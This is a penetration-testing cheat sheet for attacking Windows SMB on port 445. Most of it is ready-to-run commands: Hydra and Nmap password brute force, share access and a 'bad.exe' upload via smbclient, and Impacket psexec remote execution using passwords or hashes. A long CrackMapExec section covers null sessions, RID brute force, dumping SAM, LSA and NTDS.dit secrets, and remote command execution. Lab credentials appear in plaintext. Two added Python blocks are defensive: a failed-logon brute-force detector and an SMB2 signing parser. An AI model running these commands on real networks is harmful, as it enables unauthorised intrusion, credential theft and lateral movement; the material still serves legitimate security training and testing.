# SMB - 445

### SMB Bruteforcing

* **Hydra command:** SMB brute force using username and password lists.
* **Nmap command:** `smb-brute` NSE script using username and password files.

```bash
hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt -vV 172.19.19.70 smb
# Pass all script arguments in one --script-args; the original ssh-brute.timeout argument
# belongs to the ssh-brute script and has no effect on smb-brute, so it is dropped here.
nmap -p445 172.25.30.4 --script smb-brute.nse --script-args userdb=/home/kali/wordlistcpent/usernames,passdb=/home/kali/wordlistcpent/passwords
```
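As an added defender-side example (not part of the original page), the following Python flags what the Hydra and Nmap runs above leave behind in a Windows Security log: a burst of failed network logons (event 4625, Logon Type 3) from one source address. The log lines are constructed samples and their field layout is an assumption.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (not a real log). Assumed field layout:
# timestamp EventID LogonType TargetUserName IpAddress SubStatus
SAMPLE_EVENTS = """
2024-05-01T10:00:00 4625 3 administrator 10.0.0.5 0xC000006A
2024-05-01T10:00:02 4625 3 administrator 10.0.0.5 0xC000006A
2024-05-01T10:00:04 4625 3 administrator 10.0.0.5 0xC000006A
2024-05-01T10:00:06 4625 3 backup 10.0.0.5 0xC0000064
2024-05-01T10:00:08 4625 3 backup 10.0.0.5 0xC0000064
2024-05-01T10:00:10 4625 3 backup 10.0.0.5 0xC0000064
2024-05-01T10:00:12 4625 2 administrator 10.0.0.5 0xC000006A
2024-05-01T10:01:00 4625 3 jsmith 10.0.0.9 0xC000006A
2024-05-01T10:01:30 4624 3 jsmith 10.0.0.9 -
"""

def parse_events(text):
    """Yield one dict per non-empty line of the sample format above."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, user, ip, substatus = line.split()
        yield {"ts": datetime.fromisoformat(ts), "event_id": int(event_id),
               "logon_type": int(logon_type), "user": user.lower(),
               "ip": ip, "substatus": substatus}

def detect_smb_bruteforce(events, window=timedelta(seconds=60), threshold=5):
    """Return {source_ip: summary} for sources with >= threshold failed network
    logons (4625, Logon Type 3) inside a sliding time window. SMB authentication
    failures arrive as Logon Type 3; interactive (type 2) failures are ignored."""
    recent = defaultdict(deque)          # ip -> (ts, user) pairs inside the window
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["event_id"] != 4625 or ev["logon_type"] != 3:
            continue
        q = recent[ev["ip"]]
        q.append((ev["ts"], ev["user"]))
        while ev["ts"] - q[0][0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            users = {u for _, u in q}
            # Many distinct users with few tries each looks like a spray;
            # repeated tries against few accounts looks like a wordlist run.
            pattern = "password spray" if len(users) > len(q) // 2 else "brute force"
            alerts[ev["ip"]] = {"failures": len(q), "distinct_users": len(users),
                                "pattern": pattern, "last_seen": ev["ts"].isoformat()}
    return alerts
```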

### SMB Enumeration

```bash
# Run every NSE script whose name contains "smb"; quote the wildcard so the shell
# does not expand it, and give nmap a target (138 is NetBIOS datagram over UDP)
nmap -p 445,138,139 --script "*smb*" <IP>
```

```bash
# Connect to a share via SMB
smbclient \\\\IP\\c$ -U Administrator

# Extract interesting domain and computer info with enum4linux
enum4linux -a -u 'Administrator' -p 'iloveu' IP

# Upload a file to a share via smbclient
smbclient -c 'put bad.exe' -U t1_leonard.summers -W ZA '//thisis.za.tryhackme.com/admin$' EZpass4ever

# List shares
smbclient -L 10.129.170.128 -U Administrator

# Navigate through the ADMIN$ share
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator

# List shares without asking for a password (null session)
smbclient -N -L 10.0.0.43

# Show all NetBIOS names and services registered by the IP (Windows tool; on Linux use nmblookup -A IP)
nbtstat -A IP
```

### Impacket

```bash
# Use impacket for remote code execution through SMB
python3 /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
# -hashes takes LMHASH:NTHASH (the LM half may be left empty)
python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
impacket-psexec ECC.LOCALNET/administrator:'Pa$$w0rd123'@172.25.170.80

# Using PsExec.exe (Sysinternals) from Windows to get code execution via SMB
PsExec.exe \\172.25.170.110 cmd.exe
```

### CrackMapExec

CrackMapExec (CME) can be used to enumerate SMB sessions, Active Directory group memberships, and SMB shares. Below are some typical usage examples:

**1. Map network hosts**

```bash
# Returns a list of live hosts in the network
cme smb 192.168.1.0/24
```

**2. Generate Relay List**

```bash
# Maps the network of live hosts and saves a list of hosts that don't require SMB signing
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt
```
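To see exactly what `--gen-relay-list` is keying on, here is an added example (not CME's or the page's own code) that parses the SecurityMode field of an SMB2 NEGOTIATE response, laid out per MS-SMB2 section 2.2.4, and reports whether the server requires signing. The response bytes are built inside the block from a constructed GUID; the builder is illustrative, not a real capture.

```python
import struct
import uuid

SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001     # header flag set on every response
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001      # SecurityMode bits, MS-SMB2 2.2.4
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}
HEADER_FMT = "<4sHHIHHIIQIIQ16s"   # 64-byte SMB2 packet header
BODY_FMT = "<HHHH16sIIIIQQHHI"     # 64 fixed bytes of the NEGOTIATE response body
SAMPLE_GUID = uuid.UUID("0a1b2c3d-4e5f-4a6b-8c7d-0e1f2a3b4c5d")  # constructed, not a real server

def parse_negotiate_response(data: bytes) -> dict:
    """Decode header + NEGOTIATE body and report the server's signing posture."""
    if len(data) < struct.calcsize(HEADER_FMT) + struct.calcsize(BODY_FMT):
        raise ValueError("truncated SMB2 message")
    hdr = struct.unpack_from(HEADER_FMT, data, 0)
    proto, hdr_size, command, flags = hdr[0], hdr[1], hdr[4], hdr[6]
    if proto != SMB2_PROTOCOL_ID or hdr_size != 64:
        raise ValueError("not an SMB2 header")
    if command != 0x0000 or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    body = struct.unpack_from(BODY_FMT, data, 64)
    struct_size, security_mode, dialect, guid = body[0], body[1], body[2], body[4]
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": DIALECTS.get(dialect, hex(dialect)),
        "server_guid": str(uuid.UUID(bytes_le=guid)),
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        # Only this bit refuses unsigned sessions; hosts that leave it clear are the ones --gen-relay-list records
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }

def build_negotiate_response(security_mode: int, dialect: int) -> bytes:
    """Constructed sample response (not a capture) so the parser can be exercised offline."""
    header = struct.pack(HEADER_FMT, SMB2_PROTOCOL_ID, 64, 0, 0, 0x0000, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack(BODY_FMT, 65, security_mode, dialect, 0, SAMPLE_GUID.bytes_le,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body + b"\0"   # the 1-byte Buffer is why StructureSize is 65

def signing_verdict(data: bytes) -> str:
    """One-line audit result for a response blob."""
    info = parse_negotiate_response(data)
    state = "required" if info["signing_required"] else ("enabled" if info["signing_enabled"] else "disabled")
    return f"SMB {info['dialect']}: signing {state}"
```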

**3. Enumerate shares and access**

```bash
# Enumerates shares on the network using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --shares
```

**4. Enumerate active sessions**

```bash
# Lists active sessions on the network using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --sessions
```

**5. Enumerate disks**

```bash
# Lists disks on the network using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --disks
```

**6. Enumerate logged on users**

```bash
# Lists logged on users on the network using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --loggedon-users
```

**7. Enumerate domain users**

```bash
# Lists domain users on the network using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --users
```

**8. Enumerate users by bruteforcing RID**

```bash
# Enumerates users by bruteforcing RID using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --rid-brute
```

**9. Enumerate domain groups**

```bash
# Lists domain groups on the network using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --groups
```

**10. Enumerate local groups**

```bash
# Lists local groups on the network using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --local-groups
```

**11. Obtain domain password policy**

```bash
# Retrieves the domain password policy using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --pass-pol
```

**12. Authentication with User/Password**

```bash
# Attempts authentication using username and password
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE'
```

**13. Authentication with User/Hash**

```bash
# Attempts authentication using username and NTLM hash
cme smb 192.168.1.0/24 -u USERNAME -H 'LM:NT'
```

**14. Null Sessions**

```bash
# Attempts authentication with null sessions
cme smb 192.168.1.0/24 -u '' -p ''
```

**15. Using Username/Password Lists**

```bash
# Uses lists of usernames and passwords for authentication attempts
cme smb 192.168.1.101 -u /path/to/users.txt -p /path/to/passwords.txt
```

**16. Authentication with Local Auth**

```bash
# Attempts local authentication using provided credentials
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --local-auth
```

**17. Dump SAM hashes**

```bash
# Dumps SAM hashes using methods from secretsdump.py
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --sam
```

**18. Dump LSA secrets**

```bash
# Dumps LSA secrets using methods from secretsdump.py
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --lsa
```

**19. Dump NTDS.dit**

```bash
# Dumps the NTDS.dit from target DC using methods from secretsdump.py
cme smb 192.168.1.100 -u USERNAME -p 'PASSWORDHERE' --ntds
```

**20. Spidering Shares**

```bash
# Spiders the C$ share for files with 'txt' in the name (the protocol name is lowercase: smb)
cme smb <IP> -u USER -p PASSWORD --spider C\$ --pattern txt
```

**21. Command Execution**

```bash
# Executes commands on remote systems using specified method
cme smb 10.10.33.121 -u Administrator -p 'AAdmin!23' -X '$PSVersionTable' --exec-method wmiexec
```

**22. WMI Query Execution**

```bash
# Issues the specified WMI query
cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'"
```

**23. WMI Query Execution in a Specific Namespace**

```bash
# Issues a WMI query in the specified namespace (--wmi-namespace only takes effect together with --wmi;
# the Win32_Service query here is an illustrative choice)
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --wmi "SELECT Name FROM Win32_Service" --wmi-namespace 'root\cimv2'
```

This command runs the WMI query within the `root\cimv2` namespace, which holds most of the system management classes.

